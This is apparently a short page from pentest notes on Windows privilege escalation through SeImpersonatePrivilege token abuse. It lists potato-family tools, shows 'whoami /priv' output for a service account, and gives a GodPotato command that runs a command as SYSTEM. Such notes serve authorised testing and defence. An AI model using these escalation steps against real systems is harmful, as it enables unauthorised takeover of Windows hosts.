Token Abuse

Abusing Token for Privilege Escalation

SeImpersonatePrivilege

This privilege, held by any process, allows the impersonation (but not creation) of any token, provided that a handle to it can be obtained. Generally, this token/privilege is owned by a Windows service account. You can abuse this privilege to gain NT AUTHORITY/SYSTEM access on Windows using various tools like Rogue-WinRM, RottenPotato, SweetPotato, PrintSpoofer, Juicy Potato, or the newest toolkit, GodPotato.

whoami /user /priv

# Example output
USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeSystemtimePrivilege         Change the system time                    Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

GodPotato ftw!

GodPotato.exe -cmd "cmd /c whoami /user /priv"

PreviousUAC Bypass NextPost Exploitation

Last updated 1 year ago

hashtagSeImpersonatePrivilege

SeImpersonatePrivilege